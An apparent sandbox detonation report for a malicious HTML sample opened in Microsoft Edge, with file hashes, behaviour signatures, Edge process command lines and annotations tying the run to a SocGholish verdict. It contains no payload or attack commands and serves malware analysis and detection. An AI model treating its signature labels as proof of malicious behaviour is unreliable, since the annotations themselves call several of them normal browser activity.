| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8452S9S3\cb=gapi[1].js
| MD5 | 1d4cb29476060a1b3681fdb681200b11 |
| SHA1 | d541f88bf8d4fd98b9e0e723e050c47d4d32c18a |
| SHA256 | 5930e64b0cbf1dc5922f65060422fcf822870ac69439450ee3cb134365a51a82 |
| SHA512 | 85575c3656c8e0d70cbcdf76194e37dbe3f7bd4535221a8f51fb6b51266fd682809fa86bc556c27d127f713a6ff75290ae1fbdcd8e589211e1685f82b99d93cd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b525323b551d5d72eff50affd96f0af4 |
| SHA1 | 93bca44ec47352f7af77feee2679374709c2fc20 |
| SHA256 | 5c9c53881e3596b217fb2f2cfb0412124a6f6b2a6783b31415a0d3b175160775 |
| SHA512 | f5d655c59444f78505ff55e00b1565ca497565a9ec39d3a0ba75664d914906fe819e6ec801a204689933c165b025c4afc90dd62e14f1289cb19be73e2d70791c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3d63c8cf6448e745b47a82c7c4940bb2 |
| SHA1 | 6ee810d1b7f3daa1eeb0b189102ec1db234a9826 |
| SHA256 | 7f007527d9425d87a18c4602e3cd296dc8a3245c72c6bff368b0f4a04c676734 |
| SHA512 | 2af8e6f172dccbbf23d400c8911ef7e05dfe5e283e323ad72c8c57d5d2e533f939bb1b0b8c087de20e270c210f8be10a8418fb6d943be19ec832630bcbac4e55 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 94962f71fa41bc12a238ab081083e898 |
| SHA1 | cddd17e67ad128d300071511232db6d4f2287c2a |
| SHA256 | dc9e9ecf79ee0cb38cc49d8fb0d224fb549ed8e56fa927e88f7cbbf85acd285c |
| SHA512 | 9a4238a35b0a5dcc11c0473a5bb4f9a06d44a8c89fe7b9fc0bc3678765782ba46891bf84efc9b9016bf2ff1332f9bd1b19f77236eb8d15d044c849b23d97bb5f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 07037485722d4381dff8b74382db2388 |
| SHA1 | b6beabb6441f8a61fae986ce122869feecb06139 |
| SHA256 | 2e569ebf7e67888cc88b7657583f8656d14e6bab7ed494d3e03ac8b31e345bc5 |
| SHA512 | 5a7211f53b110c431ca4bae0a09f5ae4ba53dbd1eeec9e97d322fb05422537331972fcc6018a7e2f72a4b68261c2040fe7d76a5374cb3b831c7ade6f78c8ac88 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | baebb237b6cb88a4efa5aa7ba2f6189a |
| SHA1 | 04bfb18bf807fd0a2ba384e7017e21a714135786 |
| SHA256 | ef2a2922346076183429b617f05b1b8ee8c831f5173b56ad3882fbafc56fbe3b |
| SHA512 | 9bb785f5b02bf867db727b205d0d62ee22bc1f4204f4f5df79a7174062e1e1bfea6911264b9fe10e261cd00df6fc34db18163fcbbce38422e7bf5d276084b749 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5eac24bd2d5fc0c35211ebeb2e619947 |
| SHA1 | 270544ee440d5b500784f601861a8af08387f1fd |
| SHA256 | 1d1880cf16eddae3f4874dfd94e796dd7a06ff14f314667e26c38ecb09083326 |
| SHA512 | 44ccc538069f5e3547702bd21f8681b0758084fc0bc27348ae409f46fad70b736e5d4b24e563992c65705638cb8177f4ae2eb8b92c87146471e00f8c8eb02462 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5eeb773fed25ae67ddb27995f19f7e93 |
| SHA1 | 9586de821ad2e7ad6de2bd1942f200a95211bf00 |
| SHA256 | 82ae69f9e07e842f9c7438f0779feda48228f2b0de9f6f253a52cff7cafa04f7 |
| SHA512 | 6e14a6815a786b18340ec8c72c922a8f5e6eac3e39429139d67090c29f214f35a60b14ea54c489c339fb6577e9ca7f5d29f1489a24794b0857ce68633fd3b112 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | 1564cd80dae181fa0636e9d49e5b442f |
| SHA1 | 8f7e89e94172764f3c8f74942cfcad780c5defe1 |
| SHA256 | a96f11db1254a7236997c2d51663008b0660c37a5b85fdd7ffefdbe28e746ac8 |
| SHA512 | 32c4507644fec97bbc0ed922714774e64582df1ed444bd9bcb1fc87c9a9196312e093bafe7e18c3bf06a0917c2e66ed8d8a1dac2318d1b2d633c06839bd11ade |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 496fac2e3c5ed01c5a2aeeb2ff695a78 |
| SHA1 | fabe7de7e420d0d5f32b6524a8060e1d93561bf6 |
| SHA256 | b2f28ca626748df9de45ff0d0e6ea4d9ddbd62baa0791988e778014fd05e4ff2 |
| SHA512 | 006ed2a68a3bb463fde8c95f4a4008a57d04d6b87c7fa77d74c82199fee4191b4d108cd91635b2c033fc1ee974beb0646382885852959226042b1e652d60e95f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 470b87b92a32f220bdadb74c9d2cb144 |
| SHA1 | 229ed29e1d3eb9df1379f6268ac728754588a32d |
| SHA256 | fea0d695f95b2e9776a41481a33b5c4df0da567a783187a0377c71666152475b |
| SHA512 | 37ecd861028a79b6f6e55b9ff992c52c6e93a438215085fdb08da5ba77314358899fbe0320c079eae8a956b8e8ed06ebb026c14a9ba1cfd023bbdd4856af6a82 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0621c00b081c681f39be651a396151d4 |
| SHA1 | 3ae6915f152debf6764eef4fdf61b6ef5ca15366 |
| SHA256 | b539877cefed9f6f9be0a74ae89a88963fe2fb8a3814e5aac7d91203a2064cf3 |
| SHA512 | d89c4e1e468ad367ca85804cea36a04c1ae985ded8d373c6b70181196030c1de6ff0b93c067ec44b01c92779c96b59f1834de268da5f3ad46ff9e1c0036cd694 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 71e06771e58020d79c37a5b76215052b |
| SHA1 | 1576ffaf669a9e33a7d3671396a2296d287fe3f2 |
| SHA256 | a6dacfd4b7d0b1c56c7adddb383bbcb04240fe4f9519235bc9f6e9785d1cc47c |
| SHA512 | 08e1a5ead9e0d8c0281c7d85112d176763ccab59d29537c1f37f36b4d3e8b12146d52e7e12b5bcdf7909641d3023206951a3e4979fed9b1c73389f946740e59b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9fc77ec5ba98f1a9a1b26e84b5dfecb9 |
| SHA1 | e1d6b3113b8ee155a0cf07e9e615655878639289 |
| SHA256 | 4be96fdd90d83e762f82657dadf0b4f7affd26ca9e654c66c0d64444553e44e7 |
| SHA512 | c1ddc3131b76f134e91ace04c2b05408f468ae47a5910b83d08af3741fea77464afbec1ffbfa769e0652faaeb00ce4f5c0f7ddc56ff602600a4d26decc3bef97 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 361e8990701a9ab5756fab08a7a84004 |
| SHA1 | e3f7fc4b34c2abd8f6499b9b85e925f4df40f572 |
| SHA256 | f7c979e6788280345ca7a8c11bb053c8f1e4cc76420e8e30c9a2f1dc094a5d6b |
| SHA512 | eea21b30d31baa0177888a6f5529ec0c996975255587ff3449da916a9f08e70371d772af29e50f973146eb643e40573346cfa1e301a37464e343db82ada42d32 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b7a225e474e99b2627ab8975dac734c1 |
| SHA1 | b0b69834467a3b31109a8ee083279d522ff2d73b |
| SHA256 | c60b2c6d1b7a4428d1ee1dfdfb996bcb0b68b4a18bc2c644117bbbd26c0081a9 |
| SHA512 | 7cb15aedf2bed120152e891faf844220dd39e778ccb3873978404d175a65abb4cc571909823d31b19b025953fe22267207e0e51d36034edc5d5f19a20486194c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 54f649f4be3c4afdbe60f763450e62f4 |
| SHA1 | 0e2f0dfeb8fe02a6f5938f4ec4a088c69d9d0eca |
| SHA256 | b61e4a2b3e3f66edfd70e66f26d99065f433b21876f60fb92f2c210c0dc45cfa |
| SHA512 | 3cb210906b66cb904c9e863d3e7c232f1024aae1e77f49ded95d5dd10b6b0efcd275cf30777cbb3c3fe8ab7ca1bc4f2df38fb8d0c99ef87002ad8de3cdb86be2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8ca9b66629c323b9874dbe3f3343959d |
| SHA1 | aa210566faf2ceaffbd85d541266df10e93201cd |
| SHA256 | 28daa2e53acea4da5821ead2652023cdf50d55ffedb292b39aaa078f09056861 |
| SHA512 | b469124df3c4758b3391110010870c336d075622d8979515c8490cf833de67d7d1995c2dc129a0c1ea883453edb4b0535ac87784af0f2b15ca891a8af4e162ae |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a8d1132952179ff4656db340c9fb702b |
| SHA1 | dceebd4be13ba4e597c39c237ac682e0fa7b52be |
| SHA256 | f0d0d78b08afdc402e85f1b010082e6925562966f10ced5e10d56f930d7396be |
| SHA512 | 4e2bd173cdb14e155cdc48a70004e610c9a00988d5abd555d0d6cef02dfa18a16b4569445c6ebddbcac6db5a12f661789d1a9f34ebc90b851f71a206e0a979ce |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\rpc_shindig_random[1].js
| MD5 | 70116351ebc507731f11cfb8653f69bf |
| SHA1 | 667d48cd3c244c41a84302056e5b14140045acd3 |
| SHA256 | e3fff060584ca9c8eb12a6925252c8c6333622f4e6aeae8417449bf0ae355020 |
| SHA512 | a69875a52b635e7a561cfe2c7f4639bc122be434989dd39b37ab8dda08b49aa4bfd681c572628e9dc056c69808d0a03e2c6b4fef88db20a59ca73f097870aee9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\2254111616-postmessagerelay[1].js
| MD5 | c264799bac4a96a4cd63eb09f0476a74 |
| SHA1 | d8a1077bf625dac9611a37bfb4e6c0cd07978f4c |
| SHA256 | 17dce4003e6a3d958bb8307bffa9c195694881f549943a7bdb2769b082f9326d |
| SHA512 | 6acd83dfd3db93f1f999d524b8828b64c8c0731567c3c0b8a77c6ddcf03d0e74ee20d23171e6ceac0c9f099dce03f8e5d68e78c374da2c055973f6ac2db4e4f9 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 04:40
Reported
2024-10-29 04:42
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
msedge.exe reading SystemManufacturer and SystemProductName from HARDWARE\DESCRIPTION\System\BIOS is Chromium's own hardware-model lookup at startup (used for its hardware metrics); it is not triggered by page content.
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Recorded for msedge.exe and identity_helper.exe with no indicator. Chromium-based browsers enumerate processes while managing their own child processes, so these rows are expected for Edge and add nothing to the SocGholish verdict.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\7bcd5b3d743b791d182b9e223b10a6fc_JaffaCakes118.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8dd1246f8,0x7ff8dd124708,0x7ff8dd124718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5960 /prefetch:2
Network
Files